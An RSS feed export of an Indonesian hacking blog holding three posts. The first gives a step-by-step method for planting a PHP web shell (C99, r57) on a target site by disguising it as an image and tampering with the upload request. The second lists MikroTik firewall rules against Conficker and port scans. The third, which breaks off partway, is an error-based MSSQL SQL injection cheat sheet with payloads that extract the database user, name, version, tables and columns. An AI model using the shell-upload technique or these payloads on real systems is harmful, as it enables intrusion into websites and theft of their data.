<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Andi Wijaya</title>
	<atom:link href="http://andiwijaya.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://andiwijaya.wordpress.com</link>
	<description>What Andi Do</description>
	<lastBuildDate>Sat, 07 Jan 2012 03:14:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='andiwijaya.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Andi Wijaya</title>
		<link>http://andiwijaya.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://andiwijaya.wordpress.com/osd.xml" title="Andi Wijaya" />
	<atom:link rel='hub' href='http://andiwijaya.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Upload shell php dengan Tamper Data</title>
		<link>http://andiwijaya.wordpress.com/2012/01/07/upload-shell-php-dengan-tamper-data/</link>
		<comments>http://andiwijaya.wordpress.com/2012/01/07/upload-shell-php-dengan-tamper-data/#comments</comments>
		<pubDate>Sat, 07 Jan 2012 03:14:32 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=205</guid>
		<description><![CDATA[Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug. Untuk mengupload PHP Shell ini [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=205&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug.<br />
<a name="more"></a><br />
Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau fasilitasnya hanya untuk upload file.jpg gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit</p>
<p>1. Siapakan dulu file shell.php seperti : <a href="http://pastebin.com/f29bc8494">C99Shell</a>, <a href="http://pastebin.com/f1c206471">r57</a>, atau b374k<br />
2. Rename dengan nama : shell.php.jpg<br />
3. Install add ons <a href="https://addons.mozilla.org/en-us/firefox/addon/tamper-data/">Tamper Data</a> dulu di browser mozilla kita <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
4. Restart dan kita mulai upload<br />
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan</p>
<p><a href="https://lh3.googleusercontent.com/-AYD1ILr6Tow/TYFrq0GaqgI/AAAAAAAAA1c/38Ksf17somc/s1600/tamper.PNG"><img src="https://lh3.googleusercontent.com/-AYD1ILr6Tow/TYFrq0GaqgI/AAAAAAAAA1c/38Ksf17somc/s400/tamper.PNG" alt="" border="0" /></a></p>
<p>6. Trus Uploads shell.php.jpg kita dan tamper <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><a href="https://lh6.googleusercontent.com/-6jFYsrzMrwo/TYFsda0fh4I/AAAAAAAAA1g/atVM9wUTr10/s1600/tamper+2.PNG"><img src="https://lh6.googleusercontent.com/-6jFYsrzMrwo/TYFsda0fh4I/AAAAAAAAA1g/atVM9wUTr10/s400/tamper+2.PNG" alt="" border="0" /></a></p>
<p>7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><a href="https://lh6.googleusercontent.com/-DDA7cDG3ppE/TYFwcQWbgmI/AAAAAAAAA1o/EzVN9I95_HM/s1600/tamper+3.PNG"><img src="https://lh6.googleusercontent.com/-DDA7cDG3ppE/TYFwcQWbgmI/AAAAAAAAA1o/EzVN9I95_HM/s400/tamper+3.PNG" alt="" border="0" /></a></p>
<p>Sekarang anda tinggal cari dimana file shell anda berada .<br />
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/205/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/205/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/205/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/205/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/205/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/205/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/205/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/205/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=205&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2012/01/07/upload-shell-php-dengan-tamper-data/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>

		<media:content url="https://lh3.googleusercontent.com/-AYD1ILr6Tow/TYFrq0GaqgI/AAAAAAAAA1c/38Ksf17somc/s400/tamper.PNG" medium="image" />

		<media:content url="https://lh6.googleusercontent.com/-6jFYsrzMrwo/TYFsda0fh4I/AAAAAAAAA1g/atVM9wUTr10/s400/tamper+2.PNG" medium="image" />

		<media:content url="https://lh6.googleusercontent.com/-DDA7cDG3ppE/TYFwcQWbgmI/AAAAAAAAA1o/EzVN9I95_HM/s400/tamper+3.PNG" medium="image" />
	</item>
		<item>
		<title>Mengatasi serangan NetCut, Mac Cloning, Conficker dan Spam menggunakan Mikrotik RouterOS</title>
		<link>http://andiwijaya.wordpress.com/2012/01/02/mengatasi-serangan-netcut-mac-cloning-conficker-dan-spam-menggunakan-mikrotik-routeros/</link>
		<comments>http://andiwijaya.wordpress.com/2012/01/02/mengatasi-serangan-netcut-mac-cloning-conficker-dan-spam-menggunakan-mikrotik-routeros/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 17:38:14 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[Mikrotik]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=203</guid>
		<description><![CDATA[Ok, langsung saja.. Kali ini saya akan memberikan tips and trik racikan konfigurasi firewall mikrotik routerOS untuk menangani beberapa masalah yang sering terjadi pada jaringan Hotspot seperti RT RW net. Beberapa serangan yang sering digunakan para attacker/ hacker untuk bisa mendapatkan koneksi internet secara gratis ataupun serangan virus, spam &#38; DDOS yang dapat merusak lalu [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=203&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Ok, langsung saja.. Kali ini saya akan memberikan tips and trik racikan konfigurasi firewall mikrotik routerOS untuk menangani beberapa masalah yang sering terjadi pada jaringan Hotspot seperti RT RW net. Beberapa serangan yang sering digunakan para attacker/ hacker untuk bisa mendapatkan koneksi internet secara gratis ataupun serangan virus, spam &amp; DDOS yang dapat merusak lalu lintas data akan sangat membuat para admin jaringan merasa lelah untuk menanganinya… hahaha…</p>
<p>Oke, untuk mempersingkat waktu, langsung saja gunakan perintah-perintah berikut di terminal mikrotik kamu!</p>
<p>/ip firewall filter add action=accept chain=input comment=”default configuration (anti netcut, defaultnya accept)” disabled=no protocol=icmp</p>
<p>anti confliker<br />
/ ip firewall filter<br />
add chain=forward protocol=udp src-port=135-139 action=drop comment=”;;Block W32.Kido – Conficker” disabled=no<br />
add chain=forward protocol=udp dst-port=135-139 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=udp src-port=445 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=udp dst-port=445 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=tcp src-port=135-139 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=tcp dst-port=135-139 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=tcp src-port=445 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=tcp dst-port=445 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=tcp dst-port=4691 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=tcp dst-port=5933 action=drop comment=”&#8221; disabled=no<br />
add chain=forward protocol=udp dst-port=5355 action=drop comment=”Block LLMNR” disabled=no<br />
add chain=forward protocol=udp dst-port=4647 action=drop comment=”&#8221; disabled=no<br />
add action=drop chain=forward comment=”SMTP Deny” disabled=no protocol=tcp src-port=25<br />
add action=drop chain=forward comment=”&#8221; disabled=no dst-port=25 protocol=tcp</p>
<p>BLOX SPAM</p>
<p>/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop<br />
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop<br />
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop<br />
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop<br />
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop</p>
<p>ANTI NETCUT<br />
/ip firewall filter<br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://61.213.183.1/" rel="nofollow" target="_blank">61.213.183.1</a>-<a href="http://61.213.183.254/" rel="nofollow" target="_blank">61.213.183.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://67.195.134.1/" rel="nofollow" target="_blank">67.195.134.1</a>-<a href="http://67.195.134.254/" rel="nofollow" target="_blank">67.195.134.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://68.142.233.1/" rel="nofollow" target="_blank">68.142.233.1</a>-<a href="http://68.142.233.254/" rel="nofollow" target="_blank">68.142.233.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://68.180.217.1/" rel="nofollow" target="_blank">68.180.217.1</a>-<a href="http://68.180.217.254/" rel="nofollow" target="_blank">68.180.217.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://203.84.204.1/" rel="nofollow" target="_blank">203.84.204.1</a>-<a href="http://203.84.204.254/" rel="nofollow" target="_blank">203.84.204.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://69.63.176.1/" rel="nofollow" target="_blank">69.63.176.1</a>-<a href="http://69.63.176.254/" rel="nofollow" target="_blank">69.63.176.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://69.63.181.1/" rel="nofollow" target="_blank">69.63.181.1</a>-<a href="http://69.63.181.254/" rel="nofollow" target="_blank">69.63.181.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://63.245.209.1/" rel="nofollow" target="_blank">63.245.209.1</a>-<a href="http://63.245.209.254/" rel="nofollow" target="_blank">63.245.209.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://63.245.213.1/" rel="nofollow" target="_blank">63.245.213.1</a>-<a href="http://63.245.213.254/" rel="nofollow" target="_blank">63.245.213.254</a><br />
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=<a href="http://173.203.196.1/" rel="nofollow" target="_blank">173.203.196.1</a>-<a href="http://173.203.196.254/" rel="nofollow" target="_blank">173.203.196.254</a></p>
<p>ANTI PORT SCAN<br />
/ip firewall filter<br />
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”Port scanners to list ” disabled=no<br />
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”NMAP FIN Stealth scan”<br />
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”SYN/FIN scan”<br />
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”SYN/RST scan”<br />
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”FIN/PSH/URG scan”<br />
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”ALL/ALL scan”<br />
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”NMAP NULL scan”<br />
add chain=input src-address-list=”port scanners” action=drop comment=”dropping port scanners” disabled=no<br />
===========================================</p>
<p>TAMBAHAN<br />
Ingat, urutan dibawah harus tepat…tidak boleh tertukar-tukar…<br />
/ ip firewall filter<br />
add chain=input in-interface=ether1 protocol=tcp dst-port=21 src-address-list=ftp_blacklist action=drop</p>
<p># accept 10 incorrect logins per minute<br />
/ ip firewall filter<br />
add chain=output action=accept protocol=tcp content=”530 Login incorrect” dst-limit=1/1m,9,dst-address/1m</p>
<p>#add to blacklist<br />
/ ip firewall filter<br />
add chain=output action=add-dst-to-address-list protocol=tcp content=”530 Login incorrect” address-list=ftp_blacklist address-list-timeout=3h<br />
==================================================</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/203/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/203/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/203/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=203&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2012/01/02/mengatasi-serangan-netcut-mac-cloning-conficker-dan-spam-menggunakan-mikrotik-routeros/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>
	</item>
		<item>
		<title>Microsoft SQL Error Exploit</title>
		<link>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-error-exploit/</link>
		<comments>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-error-exploit/#comments</comments>
		<pubDate>Fri, 30 Dec 2011 17:37:59 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=199</guid>
		<description><![CDATA[ERROR SQL INJECTION &#8211; DETECTION Integer Injection: http://[site]/page.asp?id=1 having 1=1&#8211;Column &#8216;[COLUMN NAME]&#8216; is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. String Injection: http://[site]/page.asp?id=x&#8217; having 1=1&#8211;Column &#8216;[COLUMN NAME]&#8216; is invalid in the select list because it is not contained in an aggregate function and [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=199&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<table id="AutoNumber1" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; DETECTION</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Integer Injection:</span></strong><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">1 </span><span style="color:#fdb910;">having 1=1&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Column &#8216;[<span style="color:#ff3300;">COLUMN NAME</span>]&#8216; is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.<span style="color:#fdb910;"><br />
</span><br />
</span><strong><span style="font-family:Tahoma;font-size:xx-small;">String Injection:</span></strong><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">x&#8217; </span><span style="color:#fdb910;">having 1=1&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Column &#8216;[<span style="color:#ff3300;">COLUMN NAME</span>]&#8216; is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.</span></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT DATABASE USER</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 or 1=convert(int,(</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">DB USER</span>]&#8216; to a column of data type int.</span></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
</div>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT DATABASE NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 or 1=convert(int,(</span><span style="color:#ff3300;">DB_NAME</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">DB NAME</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT DATABASE VERSION</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 or 1=convert(int,(</span><span style="color:#ff3300;">@@VERSION</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">DB VERSION</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT SERVER NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1 or 1=convert(int,(</span><span style="color:#ff3300;">@@SERVERNAME</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">SERVER NAME</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
</div>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 1st  DATABASE TABLE</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> name </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">TABLE NAME 1</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 2nd DATABASE TABLE</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">name from sysobjects where xtype=char(85) and ,name&gt;&#8217;</span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">&#8216;))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">TABLE NAME 2</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 3rd DATABASE TABLE</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">name from sysobjects where xtype=char(85) and ,name&gt;&#8217;</span><span style="color:#a8a8a8;">TABLE-NAME-2</span><span style="color:#fdb910;">&#8216;))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">TABLE NAME 3</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 1st TABLE COLUMN NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(</span><span style="color:#fdb910;">select top 1 column_name from </span><span style="color:#a8a8a8;">DBNAME</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">&#8216;))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">COLUMN NAME  1</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 2nd TABLE COLUMN NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1 column_name from </span><span style="color:#a8a8a8;">DBNAME</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">&#8216; and column_name&gt;&#8217;</span><span style="color:#a8a8a8;">COLUMN-NAME-1</span><span style="color:#fdb910;">&#8216;))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">COLUMN NAME 2</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 3rd TABLE COLUMN NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
